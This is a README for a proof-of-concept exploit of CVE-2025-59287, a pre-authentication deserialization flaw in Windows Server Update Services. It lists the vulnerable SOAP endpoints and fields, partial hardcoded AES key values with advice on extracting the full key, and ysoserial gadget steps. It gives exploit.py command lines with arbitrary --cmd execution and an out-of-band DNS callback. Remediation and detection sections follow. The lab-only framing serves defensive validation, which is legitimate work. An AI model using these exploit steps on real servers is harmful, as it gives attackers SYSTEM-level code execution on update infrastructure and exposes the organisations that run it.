Windows Server Update Services (WSUS) remote code execution via insecure .NET deserialization of an attacker-controlled
AuthorizationCookie. Pre-auth, network-reachable, code runs as SYSTEM.
⚠️ AUTHORIZED TEST-ENVIRONMENT USE ONLY. For detection engineering and defensive validation against a WSUS lab server you own/control — isolated, snapshotted, and never internet-exposed. This was mass-exploited in the wild (CISA KEV); do not point it at anything you are not explicitly authorized to test.
| CVE | CVE-2025-59287 |
| Product | Windows Server Update Services (WSUS Server Role) |
| Class | Deserialization of Untrusted Data (CWE-502) → unauth RCE |
| CVSS 3.1 | 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Auth | None (pre-authentication, over the network) |
| Execution context | SYSTEM — inside w3wp.exe (WsusPool) or wsusservice.exe |
| Affected | Windows Server 2012, 2012 R2, 2016, 2019, 2022, 2022 23H2, 2025 — only when the WSUS Server Role is enabled |
| Default ports | 8530 (HTTP), 8531 (HTTPS) |
| Disclosed | 2025-10-18 · initial fix 2025-10-14 (incomplete) |
| Patched | out-of-band 2025-10-23 — KB5070881 (2025), KB5070879 (23H2), KB5070884 (2022), KB5070883 (2019), KB5070882 (2016), KB5070886 (2012 R2), KB5070887 (2012) |
| In the wild | CISA KEV 2025-10-24; ~8,000 exposed servers; active mass exploitation within hours of the patch |
| ATT&CK | T1190 (Exploit Public-Facing App), T1059.001/003 (PowerShell/cmd) |
A WSUS web service decrypts an attacker-supplied AuthorizationCookie /
EncryptedData field using AES-128-CBC with a hardcoded key (zero IV), then
passes the plaintext straight to a .NET formatter without validating the
resulting object type. A crafted, AES-encrypted deserialization gadget chain
therefore executes arbitrary code as SYSTEM.
Public analyses describe two vectors. This PoC implements the first as default and templates the second:
client (default) |
reporting |
|
|---|---|---|
| Endpoint | /ClientWebService/Client.asmx |
/ReportingWebService/ReportingWebService.asmx |
| SOAP method | GetCookie |
ReportEventBatch |
| Formatter | BinaryFormatter | SoapFormatter (custom binder) |
| Field | AuthorizationCookie.CookieData |
ReportingEvent.MiscData |
| Notes | Used by most public PoCs and in-the-wild AuthorizationCookie reports |
Code White argues this SoapFormatter path (introduced by the Oct 14 update) is the precise CVE-2025-59287 fix target |
Other reachable web services that share the cookie-decryption code:
/SimpleAuthWebService/SimpleAuth.asmx, /ApiRemoting30/WebService.asmx.
This is a deserialization exploit, so two values must exactly match the target — and public sources genuinely disagree on them:
- The hardcoded AES key. Public PoCs circulate two different 16-byte
keys (
--key hawktrace=877C14E4…,--key garvitv14=5B5A583A…). If neither works against your build, extract the real key from the target's WSUS assemblies (Microsoft.UpdateServices.Internal.BaseApi.dll/…Internal.Authorization) and pass it via--key <hex>. The--saltflag toggles the 16-byte plaintext salt some builds expect. - The gadget/formatter must match the deserializer. Use
-f BinaryFormattergadgets for theclientendpoint and-f SoapFormatterforreporting.
A successful hit often returns HTTP 500 with a deserialization/cast exception — the SOAP method errors after your gadget already executed. That error is the signal, not a failure. Confirm execution on the target, not from the HTTP response.
CVE-2025-59287-PoC/
├─ README.md
├─ exploit.py # gadget(ysoserial) -> AES-CBC -> base64 -> SOAP -> POST
├─ requirements.txt # requests, pycryptodome
├─ lab/
│ └─ install_wsus.ps1 # install the WSUS role to build a vulnerable target
└─ detection/
├─ cve-2025-59287.sigma.yml # Sigma: WSUS proc -> shell; + suspicious POSTs
└─ hunting.kql # Defender XDR / Sentinel hunting queries
The PoC does not bundle a payload generator: you supply
ysoserial.net. The default
command is benign (writes a proof file); change it with --cmd.
You need a real WSUS server as the target:
- A disposable, network-isolated Windows Server VM — snapshot it.
- Install the WSUS role and confirm it's UNPATCHED vs. the 2025-10-23 update:
powershell -ExecutionPolicy Bypass -File .\lab\install_wsus.ps1 Get-HotFix | Where-Object HotFixID -match '5070' # should be EMPTY to be vulnerable
- On your attacker box: Python 3,
pip install -r requirements.txt, and a copy ofysoserial.exe.
Never bind WSUS 8530/8531 to an untrusted network. The whole point of this CVE is that exposed WSUS = instant SYSTEM.
# benign proof-of-execution against the lab WSUS server
python exploit.py --target 10.0.0.50 --ysoserial C:\tools\ysoserial.exe
# try the other key candidate if the first build doesn't bite
python exploit.py -t 10.0.0.50 --ysoserial C:\tools\ysoserial.exe --key garvitv14
# HTTPS, custom (benign) command
python exploit.py -t wsus.lab --ssl --port 8531 --ysoserial C:\tools\ysoserial.exe \
--cmd "cmd /c whoami > C:\poc-cve-2025-59287\proof.txt 2>&1"
# secondary SoapFormatter path (template — tune to your target)
python exploit.py -t 10.0.0.50 --endpoint reporting --gadget TypeConfuseDelegate \
--ysoserial C:\tools\ysoserial.exeConfirm success on the WSUS server (not from the HTTP response):
type C:\poc-cve-2025-59287\proof.txt # default benign payload -> shows 'nt authority\system'…and you should see the detections in §6 fire (w3wp.exe/wsusservice.exe → cmd.exe).
For an out-of-band confirmation without touching disk, set --cmd to a benign
callback you control, e.g. cmd /c nslookup poc.<your-collab-domain>.
Remediate: install the 2025-10-23 out-of-band update (or later) for your
Server version. If you can't patch immediately, Microsoft's interim guidance was
to disable the WSUS Server Role or block inbound 8530/8531 at the host
firewall. Verify: Get-HotFix | ? HotFixID -match '5070'.
Detect (see detection/):
- Process chain (best signal):
w3wp.exe(WsusPool) orwsusservice.exespawningcmd.exe/powershell.exe/LOLBins — Sysmon EID 1 / Event ID 4688. A healthy WSUS host essentially never does this. →cve-2025-59287.sigma.ymlhunting.kqlquery #1.
- Server logs (IR): cast/deserialization exceptions in
…\Update Services\LogFiles\SoftwareDistribution.log(ObjectManager.DoFixups,DeserializeDataSetSchema, “Exception has been thrown by the target of an invocation”); BinaryFormatter magic prefixAAEAAAD/////; largePOSTto the.asmxendpoints in IISu_ex*.log. - Egress: connections from the WSUS process to
webhook.site/*.workers.dev/ DNS beacons →hunting.kqlquery #3.
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-59287
- Microsoft MSRC: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59287
- HawkTrace technical analysis: https://hawktrace.com/blog/cve-2025-59287/
- Code White (SoapFormatter / ReportEventBatch path): https://code-white.com/blog/
- Huntress (in-the-wild exploitation + IOCs): https://www.huntress.com/blog/exploitation-of-windows-server-update-services-remote-code-execution-vulnerability
- Palo Alto Unit 42: https://unit42.paloaltonetworks.com/microsoft-cve-2025-59287/
- ysoserial.net (gadget generation): https://github.com/pwntester/ysoserial.net